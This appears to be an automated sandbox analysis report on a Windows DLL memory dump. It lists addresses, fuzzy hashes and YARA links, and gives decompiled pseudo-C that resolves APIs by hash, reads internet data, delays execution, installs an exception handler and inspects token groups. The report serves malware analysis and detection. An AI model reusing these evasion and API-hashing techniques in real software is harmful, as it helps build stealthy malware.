0x6ea23a66
0x6ea23a69
0x6ea23a70
0x6ea23a72
0x6ea23a78
0x6ea23a83
0x6ea23a8c
0x6ea23a95
0x00000000
0x00000000
0x6ea23a9b
0x6ea23a9e
0x00000000
0x6ea23aa0
0x6ea23aa0
0x6ea23aa0
0x00000000
0x6ea23a9e
0x6ea23c30
0x6ea23c3c
0x6ea23c3c
0x6ea23aa4
0x6ea23aa6
0x6ea23aab
0x6ea23ab1
0x6ea23ab6
0x6ea23abf
0x6ea23ac4
0x6ea23ac4
0x6ea23adf
0x00000000
0x00000000
0x6ea23b1b
0x6ea23b35
0x6ea23b37
0x6ea23b39
0x6ea23c1c
0x6ea23c21
0x6ea23c23
0x6ea23ae6
0x6ea23ae6
0x6ea23aed
0x6ea23af6
0x6ea23aff
0x6ea23b08
0x6ea23bb1
0x6ea23bb5
0x6ea23bba
0x6ea23bc0
0x6ea23bd0
0x6ea23c29
0x00000000
0x6ea23c29
0x6ea23b3f
0x6ea23b3f
0x6ea23b3f
0x6ea23b44
0x6ea23bd7
0x6ea23bdc
0x6ea23be5
0x6ea23bee
0x6ea23bf7
0x6ea23c00
0x6ea23c09
0x6ea23c19
0x6ea23b4a
0x6ea23b5e
0x00000000
0x6ea23b5e
0x6ea23b44
0x00000000
0x6ea23b39
0x6ea23ae1
0x00000000
0x6ea23ae1
0x00000000

APIs

InternetReadFile.WININET(?,00000000,00000000,00000000,00000000,D27F045A,547AC48E), ref: 6EA23B35

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 7fa47fc9fb97f9354aaa2bd7c00b4606104453c6740dbec67cf17fabc9e129e9
Instruction ID: 6d0ce949e755bf5638c769f0a326d261f7925781f17c67e6ddb21e9635965556
Opcode Fuzzy Hash: 7fa47fc9fb97f9354aaa2bd7c00b4606104453c6740dbec67cf17fabc9e129e9
Instruction Fuzzy Hash: 9C518A3120C2059FD704EFA4DAA0AEEB7A8AF91648F444C3CF59657190EF319D89CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA022A0, Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6EA022A0(void* __ecx, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v24;
				intOrPtr* _t10;
				void* _t13;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t22;
				intOrPtr* _t23;
				intOrPtr* _t24;

				_t19 = __edx;
				_t24 =  &_v8;
				if(__ecx == 0) {
					 *_t24 = 0;
					_v8 = 0;
				} else {
					 *_t24 = E6EA01230(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v24 = _t19;
				}
				_t20 =  *0x6ea2b1f4; // 0xba1340
				if(_t20 == 0xc139578) {
					 *0x6ea2b1f4 = 0;
					_t20 = 0;
				}
				if(_t20 == 0) {
					L10:
					_push(0x588ab3ea);
					_t10 = L6EA07564(0x588ab3ea);
					_t23 = _t10;
					if(_t23 == 0) {
						_t10 = E6EA06C50(0x588ab3ea);
						if(_t10 != 0) {
							_push(0x588ab3ea);
							_t10 = L6EA07564(0x588ab3ea);
							_t23 = _t10;
						}
					}
					if(_t23 == 0) {
						goto L15;
					} else {
						_t24 = _t24 + 0xfffffff8;
						_t10 = E6EA067C8(_t23, 0xcd123e03);
						_t22 = _t10;
						goto L13;
					}
				} else {
					do {
						_t18 = 0;
						_t10 = 0;
						while( *((intOrPtr*)(_t10 + _t20 + 8)) != 0xcd123e03) {
							_t18 = _t18 + 1;
							_t10 = _t10 + 0x18;
							if(_t18 < 0x10) {
								continue;
							}
							goto L9;
						}
						_t22 =  *((intOrPtr*)(_t10 + _t20 + 0x14));
						if(_t22 != 0) {
							L13:
							if(_t22 == 0) {
								L15:
								return _t10;
							}
							_t13 =  *_t22(0, _t24); // executed
							return _t13;
						}
						goto L10;
						L9:
						asm("o16 nop [eax+eax]");
						_t5 = _t20 + 0x180; // 0xba8e68
						_t20 =  *_t5;
					} while (_t20 != 0);
					goto L10;
				}
			}

0x6ea022a0
0x6ea022a1
0x6ea022a6
0x6ea022c2
0x6ea022c5
0x6ea022a8
0x6ea022b7
0x6ea022ba
0x6ea022ba
0x6ea022c9
0x6ea022d5
0x6ea022d7
0x6ea022e1
0x6ea022e1
0x6ea022e5
0x6ea0230e
0x6ea02313
0x6ea02314
0x6ea02319
0x6ea0231d
0x6ea0234a
0x6ea02351
0x6ea02358
0x6ea02359
0x6ea0235e
0x6ea0235e
0x6ea02351
0x6ea02321
0x00000000
0x6ea02323
0x6ea0232a
0x6ea0232d
0x6ea02332
0x00000000
0x6ea02332
0x6ea022e7
0x6ea022e7
0x6ea022e7
0x6ea022e9
0x6ea022eb
0x6ea022f5
0x6ea022f6
0x6ea022fc
0x00000000
0x00000000
0x00000000
0x6ea022fc
0x6ea02362
0x6ea02368
0x6ea02334
0x6ea02336
0x6ea02344
0x6ea02344
0x6ea02344
0x6ea0233e
0x00000000
0x6ea0233e
0x00000000
0x6ea022fe
0x6ea022fe
0x6ea02304
0x6ea02304
0x6ea0230a
0x00000000
0x6ea022e7

APIs

NtDelayExecution.NTDLL(00000000,00000000), ref: 6EA0233E

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: ca526499b3049f851463ef416d012d6c8c98ae0213950657f7f4fe9a7aac6a28
Instruction ID: 0b7466d87fd7f324c965c9483ec523cf3b47aa2b40f9f501c9424ff4841fdd3c
Opcode Fuzzy Hash: ca526499b3049f851463ef416d012d6c8c98ae0213950657f7f4fe9a7aac6a28
Instruction Fuzzy Hash: 8E11E030F147034FD6489EE8795075A31D96F8471CF2DC66DD4159B68AEA30DCC182BA

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07A60, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6EA07A60(intOrPtr* __ecx) {
				void* _t1;

				_push(0x6ea07d40);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6ea07a60
0x6ea07a65
0x6ea07a67
0x6ea07a69

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6EA07D40,6EA07A11,588AB3EA,?,?,6E9F5168,00000001), ref: 6EA07A67

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 81d872f6a128bee6f555f0dfc1ad98a3f4ed55f13cfe7c03c3cb6054c4c03294
Instruction ID: 434257e05f4ea2b3a6457ad36284a85959a090a18df7b60e0d8ade5231cb37ba
Opcode Fuzzy Hash: 81d872f6a128bee6f555f0dfc1ad98a3f4ed55f13cfe7c03c3cb6054c4c03294
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6EA067C8, Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efd297c549cc801796ff3b7ea35c19ca10e116e0cfb933dcfbcba46bdd83facf
Instruction ID: c3e7c52313d2af27d8ca351d43887c3a3483af65730d3a864283d5b3853444c9
Opcode Fuzzy Hash: efd297c549cc801796ff3b7ea35c19ca10e116e0cfb933dcfbcba46bdd83facf
Instruction Fuzzy Hash: 88C1E4706683468FD7A0DF99E49079A77E0BBC130CF18C42DC8988BB45EB7099C9CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA047B0, Relevance: 3.6, APIs: 2, Instructions: 618
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6EA047B0(void* __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t93;
				long _t99;
				void* _t109;
				int _t112;
				intOrPtr _t118;
				char _t133;
				intOrPtr _t141;
				void* _t144;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t155;
				void* _t158;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t169;
				int _t174;
				intOrPtr _t179;
				void* _t182;
				void* _t185;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				intOrPtr* _t205;
				void* _t206;
				long _t207;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t243;
				void* _t245;
				long _t246;
				intOrPtr* _t248;
				long _t249;
				long _t250;
				long _t253;
				long _t255;
				long _t258;
				long _t259;
				long _t261;
				intOrPtr _t266;
				long _t267;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr* _t273;
				intOrPtr _t277;
				intOrPtr* _t278;
				void* _t281;
				signed int _t283;
				void* _t284;
				void* _t285;

				_t272 = __esi;
				_t270 = __edi;
				_t285 = _t284 - 0x38;
				_t246 =  *0x6ea2b1f4; // 0xba1340
				 *(_t285 + 0x34) = 0;
				if(_t246 == 0xc139578) {
					 *0x6ea2b1f4 = 0;
					goto L6;
				} else {
					if(_t246 == 0) {
						L6:
						_push(0x3ab94787);
						_t196 = L6EA07564(0x3ab94787);
						if(_t196 == 0) {
							if(E6EA06C50(0x3ab94787) != 0) {
								_push(0x3ab94787);
								_t196 = L6EA07564(0x3ab94787);
							}
						}
						if(_t196 == 0) {
							goto L25;
						} else {
							_t285 = _t285 + 0xfffffff8;
							_t248 = E6EA067C8(_t196, 0xc17c5a6e);
							goto L9;
						}
					} else {
						do {
							_t245 = 0;
							_t194 = 0;
							while( *((intOrPtr*)(_t194 + _t246 + 8)) != 0xc17c5a6e) {
								_t245 = _t245 + 1;
								_t194 = _t194 + 0x18;
								if(_t245 < 0x10) {
									continue;
								} else {
									goto L5;
								}
								goto L186;
							}
							_t248 =  *((intOrPtr*)(_t194 + _t246 + 0x14));
							if(_t248 != 0) {
								L9:
								if(_t248 == 0) {
									L25:
									return 0;
								} else {
									_push(_t285 + 0x34);
									_push(8);
									_push(0xffffffff);
									if( *_t248() == 0) {
										_t93 = E6EA07BF0(0xea5f6acc, _t272, 0xea5f6acc);
										if(_t93 != 0) {
											L174:
											if(_t93 == 0) {
												goto L178;
											} else {
												asm("int3");
												return _t93;
											}
										} else {
											_push(0xa1310f65);
											_t214 = L6EA07564(0xa1310f65);
											if(_t214 == 0) {
												if(E6EA06C50(0xa1310f65) != 0) {
													_push(0xa1310f65);
													_t214 = L6EA07564(0xa1310f65);
												}
											}
											if(_t214 == 0) {
												L178:
												if(0 != 0) {
													goto L25;
												} else {
													goto L11;
												}
											} else {
												_t285 = _t285 + 0xfffffff8;
												_t93 = E6EA067C8(_t214, 0xea5f6acc);
												goto L174;
											}
										}
									} else {
										L11:
										_t249 =  *0x6ea2b1f4; // 0xba1340
										 *(_t285 + 0x28) =  *(_t285 + 0x34);
										 *((char*)(_t285 + 0x2c)) = 1;
										 *(_t285 + 0x30) = 0;
										if(_t249 == 0xc139578) {
											 *0x6ea2b1f4 = 0;
											goto L17;
										} else {
											if(_t249 == 0) {
												L17:
												_push(0x3ab94787);
												_t198 = L6EA07564(0x3ab94787);
												if(_t198 == 0) {
													if(E6EA06C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t198 = L6EA07564(0x3ab94787);
													}
												}
												if(_t198 == 0) {
													goto L22;
												} else {
													_t285 = _t285 + 0xfffffff8;
													_t266 = E6EA067C8(_t198, 0x2eeff4c6);
													goto L20;
												}
											} else {
												do {
													_t243 = 0;
													_t185 = 0;
													while( *((intOrPtr*)(_t185 + _t249 + 8)) != 0x2eeff4c6) {
														_t243 = _t243 + 1;
														_t185 = _t185 + 0x18;
														if(_t243 < 0x10) {
															continue;
														} else {
															goto L16;
														}
														goto L186;
													}
													_t266 =  *((intOrPtr*)(_t185 + _t249 + 0x14));
													if(_t266 != 0) {
														L20:
														if(_t266 == 0) {
															L22:
															_t99 =  *(_t285 + 0x30);
															if(_t99 != 0) {
																_push(_t99);
																E6EA19350(_t285 + 4);
																_t250 =  *0x6ea2b1f4; // 0xba1340
																if(_t250 == 0xc139578) {
																	 *0x6ea2b1f4 = 0;
																	goto L32;
																} else {
																	if(_t250 == 0) {
																		L32:
																		_push(0x3ab94787);
																		_t199 = L6EA07564(0x3ab94787);
																		if(_t199 == 0) {
																			if(E6EA06C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t199 = L6EA07564(0x3ab94787);
																			}
																		}
																		if(_t199 == 0) {
																			goto L36;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t277 = E6EA067C8(_t199, 0x2eeff4c6);
																			goto L35;
																		}
																	} else {
																		do {
																			_t239 = 0;
																			_t169 = 0;
																			while( *((intOrPtr*)(_t169 + _t250 + 8)) != 0x2eeff4c6) {
																				_t239 = _t239 + 1;
																				_t169 = _t169 + 0x18;
																				if(_t239 < 0x10) {
																					continue;
																				} else {
																					goto L31;
																				}
																				goto L186;
																			}
																			_t277 =  *((intOrPtr*)(_t169 + _t250 + 0x14));
																			if(_t277 != 0) {
																				L35:
																				if(_t277 != 0) {
																					_t109 = E6EA19640(_t285 + 4, 0);
																					_t112 = GetTokenInformation( *(_t285 + 0x44), 2, _t109, E6EA19650(_t285), _t285 + 0x30); // executed
																					if(_t112 == 0) {
																						_t253 =  *0x6ea2b1f4; // 0xba1340
																						if(_t253 == 0xc139578) {
																							 *0x6ea2b1f4 = 0;
																							goto L131;
																						} else {
																							if(_t253 == 0) {
																								L131:
																								_push(0xa1310f65);
																								_t202 = L6EA07564(0xa1310f65);
																								if(_t202 == 0) {
																									if(E6EA06C50(0xa1310f65) != 0) {
																										_push(0xa1310f65);
																										_t202 = L6EA07564(0xa1310f65);
																									}
																								}
																								if(_t202 == 0) {
																									goto L138;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t163 = E6EA067C8(_t202, 0xea5f6acc);
																									goto L134;
																								}
																							} else {
																								do {
																									_t238 = 0;
																									_t166 = 0;
																									while( *((intOrPtr*)(_t166 + _t253 + 8)) != 0xea5f6acc) {
																										_t238 = _t238 + 1;
																										_t166 = _t166 + 0x18;
																										if(_t238 < 0x10) {
																											continue;
																										} else {
																											goto L130;
																										}
																										goto L186;
																									}
																									_t163 =  *((intOrPtr*)(_t166 + _t253 + 0x14));
																									if(_t163 != 0) {
																										L134:
																										if(_t163 == 0) {
																											L138:
																											if(0 != 0) {
																												goto L36;
																											} else {
																												goto L40;
																											}
																										} else {
																											asm("int3");
																											return _t163;
																										}
																									} else {
																										goto L131;
																									}
																									goto L186;
																									L130:
																									asm("o16 nop [eax+eax]");
																									_t70 = _t253 + 0x180; // 0xba8e68
																									_t253 =  *_t70;
																								} while (_t253 != 0);
																								goto L131;
																							}
																						}
																					} else {
																						L40:
																						_t278 = E6EA19640(_t285 + 4, 0);
																						_t118 =  *0x6ea2a148; // 0x0
																						 *((short*)(_t285 + 0x14)) =  *0x6ea2a14c & 0x0000ffff;
																						_t255 =  *0x6ea2b1f4; // 0xba1340
																						 *(_t285 + 0x24) = 0;
																						 *((intOrPtr*)(_t285 + 0x10)) = _t118;
																						if(_t255 == 0xc139578) {
																							 *0x6ea2b1f4 = 0;
																							goto L46;
																						} else {
																							if(_t255 == 0) {
																								L46:
																								_push(0x3ab94787);
																								_t203 = L6EA07564(0x3ab94787);
																								if(_t203 == 0) {
																									if(E6EA06C50(0x3ab94787) != 0) {
																										_push(0x3ab94787);
																										_t203 = L6EA07564(0x3ab94787);
																									}
																								}
																								if(_t203 == 0) {
																									goto L87;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t205 = E6EA067C8(_t203, 0xff8924ad);
																									goto L49;
																								}
																							} else {
																								do {
																									_t237 = 0;
																									_t161 = 0;
																									while( *((intOrPtr*)(_t161 + _t255 + 8)) != 0xff8924ad) {
																										_t237 = _t237 + 1;
																										_t161 = _t161 + 0x18;
																										if(_t237 < 0x10) {
																											continue;
																										} else {
																											goto L45;
																										}
																										goto L186;
																									}
																									_t205 =  *((intOrPtr*)(_t161 + _t255 + 0x14));
																									if(_t205 != 0) {
																										L49:
																										if(_t205 == 0) {
																											L87:
																											L6EA19510(_t285);
																											if( *((char*)(_t285 + 0x2c)) != 0) {
																												E6EA1BE30(_t285 + 0x28, _t272);
																											}
																											return 0;
																										} else {
																											_push(_t285 + 0x24);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0x220);
																											_push(0x20);
																											_push(2);
																											_push(_t285 + 0x10);
																											if( *_t205() == 0) {
																												_t258 =  *0x6ea2b1f4; // 0xba1340
																												if(_t258 == 0xc139578) {
																													 *0x6ea2b1f4 = 0;
																													goto L107;
																												} else {
																													if(_t258 == 0) {
																														L107:
																														_push(0xa1310f65);
																														_t206 = L6EA07564(0xa1310f65);
																														if(_t206 == 0) {
																															if(E6EA06C50(0xa1310f65) != 0) {
																																_push(0xa1310f65);
																																_t206 = L6EA07564(0xa1310f65);
																															}
																														}
																														if(_t206 == 0) {
																															goto L114;
																														} else {
																															_t285 = _t285 + 0xfffffff8;
																															_t155 = E6EA067C8(_t206, 0xea5f6acc);
																															goto L110;
																														}
																													} else {
																														do {
																															_t236 = 0;
																															_t158 = 0;
																															while( *((intOrPtr*)(_t158 + _t258 + 8)) != 0xea5f6acc) {
																																_t236 = _t236 + 1;
																																_t158 = _t158 + 0x18;
																																if(_t236 < 0x10) {
																																	continue;
																																} else {
																																	goto L106;
																																}
																																goto L186;
																															}
																															_t155 =  *((intOrPtr*)(_t158 + _t258 + 0x14));
																															if(_t155 != 0) {
																																L110:
																																if(_t155 == 0) {
																																	L114:
																																	if(0 != 0) {
																																		goto L87;
																																	} else {
																																		goto L51;
																																	}
																																} else {
																																	asm("int3");
																																	return _t155;
																																}
																															} else {
																																goto L107;
																															}
																															goto L186;
																															L106:
																															asm("o16 nop [eax+eax]");
																															_t63 = _t258 + 0x180; // 0xba8e68
																															_t258 =  *_t63;
																														} while (_t258 != 0);
																														goto L107;
																													}
																												}
																											} else {
																												L51:
																												_t207 =  *(_t285 + 0x24);
																												if( *_t278 <= 0) {
																													L67:
																													if(_t207 == 0 || _t207 == 0xffffffff) {
																														_t133 = 1;
																													} else {
																														_t133 = 0;
																													}
																													if(_t133 != 0) {
																														L84:
																														L6EA19510(_t285);
																														if( *((char*)(_t285 + 0x2c)) != 0) {
																															E6EA1BE30(_t285 + 0x28, _t272);
																														}
																														return 0;
																													} else {
																														_t259 =  *0x6ea2b1f4; // 0xba1340
																														if(_t259 == 0xc139578) {
																															 *0x6ea2b1f4 = 0;
																															goto L79;
																														} else {
																															if(_t259 == 0) {
																																L79:
																																_push(0x3ab94787);
																																_t281 = L6EA07564(0x3ab94787);
																																if(_t281 == 0) {
																																	if(E6EA06C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t281 = L6EA07564(0x3ab94787);
																																	}
																																}
																																if(_t281 == 0) {
																																	goto L84;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t141 = E6EA067C8(_t281, 0x9d775c6);
																																	goto L82;
																																}
																															} else {
																																do {
																																	_t233 = 0;
																																	_t144 = 0;
																																	while( *((intOrPtr*)(_t144 + _t259 + 8)) != 0x9d775c6) {
																																		_t233 = _t233 + 1;
																																		_t144 = _t144 + 0x18;
																																		if(_t233 < 0x10) {
																																			continue;
																																		} else {
																																			goto L78;
																																		}
																																		goto L186;
																																	}
																																	_t141 =  *((intOrPtr*)(_t144 + _t259 + 0x14));
																																	if(_t141 != 0) {
																																		L82:
																																		if(_t141 == 0) {
																																			goto L84;
																																		} else {
																																			_push(_t207);
																																			asm("int3");
																																			return _t141;
																																		}
																																	} else {
																																		goto L79;
																																	}
																																	goto L186;
																																	L78:
																																	asm("o16 nop [eax+eax]");
																																	_t52 = _t259 + 0x180; // 0xba8e68
																																	_t259 =  *_t52;
																																} while (_t259 != 0);
																																goto L79;
																															}
																														}
																													}
																												} else {
																													 *(_t285 + 0x18) = _t207;
																													 *((intOrPtr*)(_t285 + 0x1c)) = _t272;
																													_t273 = _t278;
																													 *((intOrPtr*)(_t285 + 0x20)) = _t270;
																													_t283 = 0;
																													do {
																														_t261 =  *0x6ea2b1f4; // 0xba1340
																														if(_t261 == 0xc139578) {
																															 *0x6ea2b1f4 = 0;
																															goto L60;
																														} else {
																															if(_t261 == 0) {
																																L60:
																																_push(0x3ab94787);
																																_t209 = L6EA07564(0x3ab94787);
																																if(_t209 == 0) {
																																	if(E6EA06C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t209 = L6EA07564(0x3ab94787);
																																	}
																																}
																																if(_t209 == 0) {
																																	goto L65;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t150 = E6EA067C8(_t209, 0x68adfb76);
																																	goto L63;
																																}
																															} else {
																																do {
																																	_t235 = 0;
																																	_t149 = 0;
																																	while( *((intOrPtr*)(_t149 + _t261 + 8)) != 0x68adfb76) {
																																		_t235 = _t235 + 1;
																																		_t149 = _t149 + 0x18;
																																		if(_t235 < 0x10) {
																																			continue;
																																		} else {
																																			goto L59;
																																		}
																																		goto L186;
																																	}
																																	_t150 =  *((intOrPtr*)(_t149 + _t261 + 0x14));
																																	if(_t150 != 0) {
																																		L63:
																																		if(_t150 == 0) {
																																			goto L65;
																																		} else {
																																			_push( *((intOrPtr*)(_t273 + 4 + _t283 * 8)));
																																			_push( *(_t285 + 0x28));
																																			asm("int3");
																																			return _t150;
																																		}
																																	} else {
																																		goto L60;
																																	}
																																	goto L186;
																																	L59:
																																	asm("o16 nop [eax+eax]");
																																	_t42 = _t261 + 0x180; // 0xba8e68
																																	_t261 =  *_t42;
																																} while (_t261 != 0);
																																goto L60;
																															}
																														}
																														goto L186;
																														L65:
																														_t283 = _t283 + 1;
																													} while (_t283 <  *_t273);
																													_t207 =  *(_t285 + 0x18);
																													_t272 =  *((intOrPtr*)(_t285 + 0x1c));
																													goto L67;
																												}
																											}
																										}
																									} else {
																										goto L46;
																									}
																									goto L186;
																									L45:
																									asm("o16 nop [eax+eax]");
																									_t33 = _t255 + 0x180; // 0xba8e68
																									_t255 =  *_t33;
																								} while (_t255 != 0);
																								goto L46;
																							}
																						}
																					}
																				} else {
																					L36:
																					L6EA19510(_t285);
																					if( *((char*)(_t285 + 0x2c)) != 0) {
																						E6EA1BE30(_t285 + 0x28, _t272);
																					}
																					return 0;
																				}
																			} else {
																				goto L32;
																			}
																			goto L186;
																			L31:
																			asm("o16 nop [eax+eax]");
																			_t21 = _t250 + 0x180; // 0xba8e68
																			_t250 =  *_t21;
																		} while (_t250 != 0);
																		goto L32;
																	}
																}
															} else {
																if( *((char*)(_t285 + 0x2c)) != 0) {
																	E6EA1BE30(_t285 + 0x28, _t272);
																}
																goto L25;
															}
														} else {
															_t174 = GetTokenInformation( *(_t285 + 0x44), 2, 0, 0, _t285 + 0x30); // executed
															if(_t174 == 0) {
																_t267 =  *0x6ea2b1f4; // 0xba1340
																if(_t267 == 0xc139578) {
																	 *0x6ea2b1f4 = 0;
																	goto L155;
																} else {
																	if(_t267 == 0) {
																		L155:
																		_push(0xa1310f65);
																		_t213 = L6EA07564(0xa1310f65);
																		if(_t213 == 0) {
																			if(E6EA06C50(0xa1310f65) != 0) {
																				_push(0xa1310f65);
																				_t213 = L6EA07564(0xa1310f65);
																			}
																		}
																		if(_t213 == 0) {
																			goto L22;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t179 = E6EA067C8(_t213, 0xea5f6acc);
																			goto L158;
																		}
																	} else {
																		do {
																			_t242 = 0;
																			_t182 = 0;
																			while( *((intOrPtr*)(_t182 + _t267 + 8)) != 0xea5f6acc) {
																				_t242 = _t242 + 1;
																				_t182 = _t182 + 0x18;
																				if(_t242 < 0x10) {
																					continue;
																				} else {
																					goto L154;
																				}
																				goto L186;
																			}
																			_t179 =  *((intOrPtr*)(_t182 + _t267 + 0x14));
																			if(_t179 != 0) {
																				L158:
																				if(_t179 == 0) {
																					goto L22;
																				} else {
																					asm("int3");
																					return _t179;
																				}
																			} else {
																				goto L155;
																			}
																			goto L186;
																			L154:
																			asm("o16 nop [eax+eax]");
																			_t77 = _t267 + 0x180; // 0xba8e68
																			_t267 =  *_t77;
																		} while (_t267 != 0);
																		goto L155;
																	}
																}
															} else {
																goto L22;
															}
														}
													} else {
														goto L17;
													}
													goto L186;
													L16:
													asm("o16 nop [eax+eax]");
													_t12 = _t249 + 0x180; // 0xba8e68
													_t249 =  *_t12;
												} while (_t249 != 0);
												goto L17;
											}
										}
									}
								}
							} else {
								goto L6;
							}
							goto L186;
							L5:
							asm("o16 nop [eax+eax]");
							_t4 = _t246 + 0x180; // 0xba8e68
							_t246 =  *_t4;
						} while (_t246 != 0);
						goto L6;
					}
				}
				L186:
			}

0x6ea047b0
0x6ea047b0
0x6ea047b2
0x6ea047b5
0x6ea047bb
0x6ea047c9
0x6ea050e3
0x00000000
0x6ea047cf
0x6ea047d1
0x6ea047fe
0x6ea04803
0x6ea04809
0x6ea0480d
0x6ea050ba
0x6ea050c5
0x6ea050cb
0x6ea050cb
0x6ea050ba
0x6ea04815
0x00000000
0x6ea0481b
0x6ea04822
0x6ea0482a
0x00000000
0x6ea0482a
0x6ea047d3
0x6ea047d3
0x6ea047d3
0x6ea047d5
0x6ea047d7
0x6ea047e5
0x6ea047e6
0x6ea047ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea047ec
0x6ea050d2
0x6ea050d8
0x6ea0482c
0x6ea0482e
0x6ea048fc
0x6ea04903
0x6ea04834
0x6ea04838
0x6ea04839
0x6ea0483b
0x6ea04841
0x6ea0504d
0x6ea05054
0x6ea0507a
0x6ea0507c
0x00000000
0x6ea0507e
0x6ea0507e
0x6ea0507f
0x6ea0507f
0x6ea05056
0x6ea0505b
0x6ea05061
0x6ea05065
0x6ea0509d
0x6ea050a4
0x6ea050aa
0x6ea050aa
0x6ea0509d
0x6ea05069
0x6ea0508d
0x6ea05082
0x00000000
0x6ea05088
0x00000000
0x6ea05088
0x6ea0506b
0x6ea05072
0x6ea05075
0x00000000
0x6ea05075
0x6ea05069
0x6ea04847
0x6ea04847
0x6ea0484b
0x6ea04851
0x6ea04855
0x6ea0485a
0x6ea04868
0x6ea05038
0x00000000
0x6ea0486e
0x6ea04870
0x6ea0489d
0x6ea048a2
0x6ea048a8
0x6ea048ac
0x6ea0500f
0x6ea0501a
0x6ea05020
0x6ea05020
0x6ea0500f
0x6ea048b4
0x00000000
0x6ea048b6
0x6ea048bd
0x6ea048c5
0x00000000
0x6ea048c5
0x6ea04872
0x6ea04872
0x6ea04872
0x6ea04874
0x6ea04876
0x6ea04884
0x6ea04885
0x6ea0488b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0488b
0x6ea05027
0x6ea0502d
0x6ea048c7
0x6ea048c9
0x6ea048e4
0x6ea048e4
0x6ea048ea
0x6ea04904
0x6ea04909
0x6ea0490e
0x6ea0491a
0x6ea04f51
0x00000000
0x6ea04920
0x6ea04922
0x6ea0494f
0x6ea04954
0x6ea0495a
0x6ea0495e
0x6ea04f28
0x6ea04f33
0x6ea04f39
0x6ea04f39
0x6ea04f28
0x6ea04966
0x00000000
0x6ea04968
0x6ea0496f
0x6ea04977
0x00000000
0x6ea04977
0x6ea04924
0x6ea04924
0x6ea04924
0x6ea04926
0x6ea04928
0x6ea04936
0x6ea04937
0x6ea0493d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0493d
0x6ea04f40
0x6ea04f46
0x6ea04979
0x6ea0497b
0x6ea049a3
0x6ea049c1
0x6ea049c5
0x6ea04e71
0x6ea04e7d
0x6ea04f10
0x00000000
0x6ea04e83
0x6ea04e85
0x6ea04eae
0x6ea04eb3
0x6ea04eb9
0x6ea04ebd
0x6ea04ef5
0x6ea04efc
0x6ea04f02
0x6ea04f02
0x6ea04ef5
0x6ea04ec1
0x00000000
0x6ea04ec3
0x6ea04eca
0x6ea04ecd
0x00000000
